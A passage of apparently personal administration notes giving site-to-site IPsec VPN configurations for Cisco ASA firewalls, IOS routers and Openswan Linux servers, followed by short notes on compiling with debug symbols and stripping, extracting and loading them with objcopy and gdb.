destination static OUTSIDE_NET OUTSIDE_NET
ASA-1(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL

ASA-2(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-2(config-ikev1-policy)# authentication pre-share
ASA-2(config-ikev1-policy)# encryption aes
ASA-2(config-ikev1-policy)# hash sha
ASA-2(config-ikev1-policy)# group 2
ASA-2(config-ikev1-policy)# lifetime 86400
ASA-2(config)# crypto ikev1 am-disable
ASA-2(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-2(config)# tunnel-group 12.12.12.1 type ipsec-l2l
ASA-2(config)# tunnel-group 12.12.12.1 ipsec-attributes
ASA-2(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-2(config)# access-list CRYPTO_ACL permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-2(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.1
ASA-2(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-2(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-2(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-2(config)# crypto map CRYPTO_MAP interface outside
ASA-2(config)# route outside 192.168.1.0 255.255.255.0 12.12.12.1
ASA-2(config)# object network INSIDE_NET
ASA-2(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-2(config)# object network OUTSIDE_NET
ASA-2(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-2(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET
destination static OUTSIDE_NET OUTSIDE_NET
ASA-2(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL

Between two IOS routers

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Between two Openswan servers

LINUX-1# route add default gw 12.12.12.2
LINUX-1# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-1# iptables -t nat -I POSTROUTING -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT
LINUX-1# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 12.12.12.1 -o eth0
LINUX-1# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-2
 type=tunnel
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-1# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-1# service ipsec start

LINUX-2# route add default gw 12.12.12.1
LINUX-2# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-2# iptables -t nat -I POSTROUTING -s 192.168.2.0/24 -d 192.168.1.0/24 -j ACCEPT
LINUX-2# iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -j SNAT --to 12.12.12.2 -o eth0
LINUX-2# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-1
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-2# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-2# service ipsec start

# Working with symbols files

What is a symbols file?

File containing a table of the identifiers information relating to its declaration and location.


Compiling with or without debugging information for GDB

# gcc -o example_debug -ggdb example.c
# gcc -o example_nodebug example.c

Listing symbols from object file

# nm example_debug

Three columns: Virtual_address | Symbol_type | Symbol_name
Lowercase symbols types are local and uppercase are global (external).

Copying debug symbols to an external file

# objcopy --only-keep-debug example_debug example.dbg

Striping debug symbols added with -ggdb

# objcopy --strip-debug example_debug

Striping all symbols information unneeded

# objcopy --strip-debug --strip-unneeded example_debug

Adding debug symbols to a binary

# gdb example_nodebug
(gdb) symbol-file example.dbg

or

# objcopy --add-gnu-debuglink=example.dbg example_nodebug
# gdb example_nodebug

Debugging a core file

# gdb example corefile
(gdb) symbol-file example.dbg
(gdb) bt